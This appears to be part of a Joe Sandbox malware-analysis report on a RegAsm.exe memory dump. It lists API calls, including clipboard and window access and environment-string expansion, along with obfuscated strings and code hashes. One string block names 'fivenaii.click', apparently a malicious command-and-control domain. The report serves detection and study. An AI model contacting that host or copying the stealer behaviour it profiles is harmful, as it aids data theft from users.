                                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040ECA2
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeSecurity
                                                                                                • String ID:
                                                                                                • API String ID: 640775948-0

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 79 43e3a9-43e3c4 GetForegroundWindow call 4402f0 82 43e3c9-43e409 79->82
                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32 ref: 0043E3BA
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: ForegroundWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2020703349-0

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 83 43c570-43c57c 84 43c583-43c584 83->84 85 43c585-43c597 call 43f990 RtlFreeHeap 83->85
                                                                                                APIs
                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?,0043E0F9), ref: 0043C590
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3298025750-0

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 89 43c55b-43c568 RtlAllocateHeap
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(?,00000000), ref: 0043C561
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: Uninitialize
                                                                                                • String ID:
                                                                                                • API String ID: 3861434553-0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: "7B$%"$+A#C=]=_$- $f$8]pY$9#'$=]=_$CNF8$Fm$I$JOSP$Q*RG$R03!$V]$].n^$_^]\$_^]\$eN$fivenaii.click$g}zh$p7B$s$wdnf$~SS}$rp
                                                                                                • API String ID: 0-3565097191
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                • String ID: '$($*$-$5$6$8$;$=$I$L$q$}
                                                                                                • API String ID: 2832541153-2064290267
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ":B$+A#C=]=_$=]=_$_^]\$eN$p7B$rp
                                                                                                • API String ID: 0-2092896893
                                                                                                APIs
                                                                                                • RtlExpandEnvironmentStrings.NTDLL ref: 00411EC3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                • String ID: 8$?$L$[$^$a$p$y$|
                                                                                                • API String ID: 237503144-3949209405
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: !A/C$$Y)[$1Q>S$DE$O=q?$P-X/$S%g'$Z)o+$f!V#$r$s1z3$}5x7$}9F;
                                                                                                • API String ID: 0-3413813421
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: "nl$#M%O$*"$4UW$\701$\701$a`|v$wt$AC$MO$pv$uvw
                                                                                                • API String ID: 0-635595044
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: AL$CPm5$O}nl$Yxqs$f>mI$hch&$t|f$uvqs$
                                                                                                • API String ID: 0-1556426300
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 47:$ " $220$AZDH$UXWZ$nV[k$pMC@$:/'
                                                                                                • API String ID: 0-3711047884
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: _^]\
                                                                                                • API String ID: 0-3116432788
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: _^]\_^]\$rqB$uYD\$PV$X^$\R
                                                                                                • API String ID: 0-1627709806
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: >$HYZF$HYZF$UMAG$Y2^0$]><
                                                                                                • API String ID: 0-2666672646
                                                                                                APIs
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004284BD
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004285B4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                • String ID: LF7Y$_^]\
                                                                                                • API String ID: 237503144-3688711800
                                                                                                APIs
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004284BD
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004285B4
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                • String ID: LF7Y$_^]\
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: _^]\$_^]\$f$fiP$jiP
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 2h?n$7$SP$^`/4$gfff
                                                                                                APIs
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?), ref: 004291DA
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                • String ID: +Ku$wpq
                                                                                                APIs
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: MetricsSystem
                                                                                                • String ID:
                                                                                                APIs
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00429170
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                • String ID: M/($M/(
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: VN$VN$i$i
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 7UA$D]+\$_^]\
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: @Ukx$
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 1$A
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: C@$_^]\
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (. 7$,7
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: EWC`
                                                                                                APIs
                                                                                                • FreeLibrary.KERNEL32(1A11171A), ref: 0042D2A4
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary
                                                                                                • String ID:
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ><+
                                                                                                Strings
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: "
                                                                                                APIs
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00429F6C
                                                                                                Similarity
                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                • String ID:
                                                                                                • API String ID: 237503144-0
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: t
                                                                                                • API String ID: 0-2238339752
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: _^]\
                                                                                                • API String ID: 2994545307-3116432788
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: _^]\
                                                                                                • API String ID: 0-3116432788
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: _^]\
                                                                                                • API String ID: 2994545307-3116432788
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: N&
                                                                                                • API String ID: 0-3274356042
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: N&
                                                                                                • API String ID: 0-3274356042
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @
                                                                                                • API String ID: 0-2766056989
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: =<32
                                                                                                • API String ID: 2994545307-852023076
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: AB@|
                                                                                                • API String ID: 0-3627600888
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0$z
                                                                                                • API String ID: 0-542936926
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: _^]\
                                                                                                • API String ID: 0-3116432788
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,-
                                                                                                • API String ID: 0-1027024164
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: @
                                                                                                • API String ID: 2994545307-2766056989
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ses`
                                                                                                • API String ID: 0-1601344200
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ses`
                                                                                                • API String ID: 0-1601344200
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: _^]\
                                                                                                • API String ID: 0-3116432788
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6c171becab70a86a6e575e69f5b8f9388b08847a9ebf173f34fd08f30fb17e69
                                                                                                • Instruction ID: 15bf1ea58ee97730c61fd6eda894784fa47516086410607d7a072294ae37ca60
                                                                                                • Opcode Fuzzy Hash: 6c171becab70a86a6e575e69f5b8f9388b08847a9ebf173f34fd08f30fb17e69
                                                                                                • Instruction Fuzzy Hash: DB22243AB54211CFDB08CF78D8A12AAB3E2FF8A314F1A857DC94697351D7389851CB85
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9edad3ee9539bfad45d948b53ca40223dce90882209d286bf0c99f9c6cd7d631
                                                                                                • Instruction ID: 4eb073694aac07531e4e37dd991e5aaa8cdb99ba0f72cd08d303837d400a2551
                                                                                                • Opcode Fuzzy Hash: 9edad3ee9539bfad45d948b53ca40223dce90882209d286bf0c99f9c6cd7d631
                                                                                                • Instruction Fuzzy Hash: 3552F5715083458FCB15CF24C0906AABFE1BF89305F188A7EF8996B381D779D949CB89
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6e797157fb35717b6a91bbe19d3c6782b16ec68ef1e5ad1ec3f47f605a4e618f
                                                                                                • Instruction ID: 6123c4b066af5df033588bdcadea87e91db6a899c9f8ce647c920f563282eda9
                                                                                                • Opcode Fuzzy Hash: 6e797157fb35717b6a91bbe19d3c6782b16ec68ef1e5ad1ec3f47f605a4e618f
                                                                                                • Instruction Fuzzy Hash: E322A472A087118BD725DF18D8806ABB3E1BFC4319F19893ED986A7385D738B811CB57
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5b217010d00d36b6e532b914cc2c8748e4c1d1399e6fa795548d92cd5122fdeb
                                                                                                • Instruction ID: bc1c9a79bd48fbe04f38ca9b4e00e2ed040d16652403f2f97064ad5dbaff0f70
                                                                                                • Opcode Fuzzy Hash: 5b217010d00d36b6e532b914cc2c8748e4c1d1399e6fa795548d92cd5122fdeb
                                                                                                • Instruction Fuzzy Hash: 9502483AB54211CFD708CF78D8E02AAB7A2FF8A314F1A857DC94693351D739A851CB85
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c87e449dc06f3ba1431d52dba96a7b849506db30f3e9f92c5d405e1d6b40a5de
                                                                                                • Instruction ID: a1c715d08816259ade05fabf2ed31b4fea3a659fa95dcf98a80d69cb0f26fb97
                                                                                                • Opcode Fuzzy Hash: c87e449dc06f3ba1431d52dba96a7b849506db30f3e9f92c5d405e1d6b40a5de
                                                                                                • Instruction Fuzzy Hash: 59F13939B54211CFD708CF78D8E02AAB3A2FF8A314F1A857DC94693351D735A851CB85
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3a977913465e41e9bc8fdf4fe2f93bdf54fd14983a5a5a95a9e13933d6850651
                                                                                                • Instruction ID: 7c816634e29e8635841472aa4442699fe105e1924a6df37b46faa06d9bb3fd90
                                                                                                • Opcode Fuzzy Hash: 3a977913465e41e9bc8fdf4fe2f93bdf54fd14983a5a5a95a9e13933d6850651
                                                                                                • Instruction Fuzzy Hash: 87F13939B54211CFDB08CF78D8E02AAB3A2FF8A314F19857DC94693351D739A851CB85
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 80d8542304fd61a6ec4704e93bd93ae71f34bee62e8590f6df1c4416f41d4fae
                                                                                                • Instruction ID: 5e9d7e84427f8d5228b95ea90cb98d597139ae8c2cd507701152bf7f0d2aec8f
                                                                                                • Opcode Fuzzy Hash: 80d8542304fd61a6ec4704e93bd93ae71f34bee62e8590f6df1c4416f41d4fae
                                                                                                • Instruction Fuzzy Hash: DBE117B1E00215CFCB14CF69C8516BBBBB1FF4A310F18465DE496AB391E338A951CB99
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e75f06d64608b7b62d8af53fcc16e7372a13ff163848b6366e20841680721154
                                                                                                • Instruction ID: 0a10cce7f6b7f4c9e5a99d8e2b4a5133f7361f2e21e3c94240870ffe1abc1756
                                                                                                • Opcode Fuzzy Hash: e75f06d64608b7b62d8af53fcc16e7372a13ff163848b6366e20841680721154
                                                                                                • Instruction Fuzzy Hash: FAE105B1E00615CFCB14CF69C8516BBBBB1FF4A310F18465DE496AB391E338A951CB98
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6587f211f8bb243ac471bf4d418ae114b6383508c51c90636e998149a2c9f481
                                                                                                • Instruction ID: 0795aabbeeca3c289a54d5a983081f6cc9b815f424e4503ad834db78cbe5b8b0
                                                                                                • Opcode Fuzzy Hash: 6587f211f8bb243ac471bf4d418ae114b6383508c51c90636e998149a2c9f481
                                                                                                • Instruction Fuzzy Hash: 46B1FF39B04211CFCB08CF78E8902AAB7B2FF8A324F1985BDD94593351C775A861CB85
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f54337c51817de601ce1ec662ea4a86470746f121211f08e90cfc523ef7306dd
                                                                                                • Instruction ID: 8f12c1f11cf7dd9d5989c678c09bce864ea8bb7899150d07336210a81ccf9f3f
                                                                                                • Opcode Fuzzy Hash: f54337c51817de601ce1ec662ea4a86470746f121211f08e90cfc523ef7306dd
                                                                                                • Instruction Fuzzy Hash: 2AB11E39A04205CFDB08CF78D8902AEB7B2FF8A314F19857DD94593391D735A922CB85
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentExpandStrings$Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1780199113-0
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2c87cf7490ba7f349dbf4ff6d15317452443a64d08c45edd5236fd878cf74ed6
                                                                                                • Instruction ID: 6759ef11ba54ebcff8aa8f6da36673660d6dd1d1c904dc71617b67ba0d321406
                                                                                                • Opcode Fuzzy Hash: 2c87cf7490ba7f349dbf4ff6d15317452443a64d08c45edd5236fd878cf74ed6
                                                                                                • Instruction Fuzzy Hash: EC01B174E412688BCB24CF66E8912BEB7B1FF56305F186068E482FB380DB358C05CB59
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 98f4e3217fe9b5c4e997299aec1ba0aa40f02e45b7d4679749b3d65f6db5070c
                                                                                                • Instruction ID: 934d56785e493b3be4b0c9c008a8aca41c7e0e8933f1bbf3a4c9d2d3fb154c99
                                                                                                • Opcode Fuzzy Hash: 98f4e3217fe9b5c4e997299aec1ba0aa40f02e45b7d4679749b3d65f6db5070c
                                                                                                • Instruction Fuzzy Hash: 16F0F0244086938ADB059F2980A0776FBA1AF23345F2C41DEC4C0AB393CB2AC8068758
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
                                                                                                • Instruction ID: 53e9e5a03a9e822e66d5819fe35fee1f40f302e6fc978103a9a9be73ad9cdb27
                                                                                                • Opcode Fuzzy Hash: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
                                                                                                • Instruction Fuzzy Hash: C7F065105087F28ADB234B3E54606B3AFE09B63120B581BD6C8E19B3C7C3199497C36A
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f6e45a90e1ceaff6c5d0e3e053bdb80ffa80649d360dfdb931296267ad3d0f33
                                                                                                • Instruction ID: e2807706931cebe5a4fd8447433720849932be0b4ea6b6dd525263aa63fc0ea0
                                                                                                • Opcode Fuzzy Hash: f6e45a90e1ceaff6c5d0e3e053bdb80ffa80649d360dfdb931296267ad3d0f33
                                                                                                • Instruction Fuzzy Hash: 270149306042428BD344CF38CCA056BFBA1EB83324F08C79DC45687796C638C442C799
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c4f87736648c9b6f2dd64c8d371659d93ba6f9c6e5d05e4d379e6cf43d16ee00
                                                                                                • Instruction ID: 2cc704b116e4bd3b8fd511eeb7f6c98f4211d06ad42a95779158915a2f3845ef
                                                                                                • Opcode Fuzzy Hash: c4f87736648c9b6f2dd64c8d371659d93ba6f9c6e5d05e4d379e6cf43d16ee00
                                                                                                • Instruction Fuzzy Hash: C6C0123C583840DF83088F20EC08879B374BB0B202B006824E807E33A2CB22A511AA6E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a40189d29a415ea6312dcdd67a1103e7914f9f9b1922703845f218493d16d700
                                                                                                • Instruction ID: b006575f33bb30629b5eebf8556c7f8348362c77d274ae0a1f7cd2f0d910ddfd
                                                                                                • Opcode Fuzzy Hash: a40189d29a415ea6312dcdd67a1103e7914f9f9b1922703845f218493d16d700
                                                                                                • Instruction Fuzzy Hash: 92B092B4A1C2018A87088F00E140039EAB4629F202F30A02E908A63215C225C1058A8E
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitVariant
                                                                                                • String ID: A$B$B$D$K$M$j$q$w$y
                                                                                                • API String ID: 1927566239-3160828158
                                                                                                Similarity
                                                                                                • API ID: AllocString
                                                                                                • String ID: 0$a$c$e$f$g
                                                                                                • API String ID: 2525500382-100324306
                                                                                                Similarity
                                                                                                • API ID: Variant$ClearInit
                                                                                                • String ID: C$C$P$T
                                                                                                • API String ID: 2610073882-3051599793
                                                                                                Similarity
                                                                                                • API ID: MetricsSystem
                                                                                                • String ID:
                                                                                                • API String ID: 4116985748-3916222277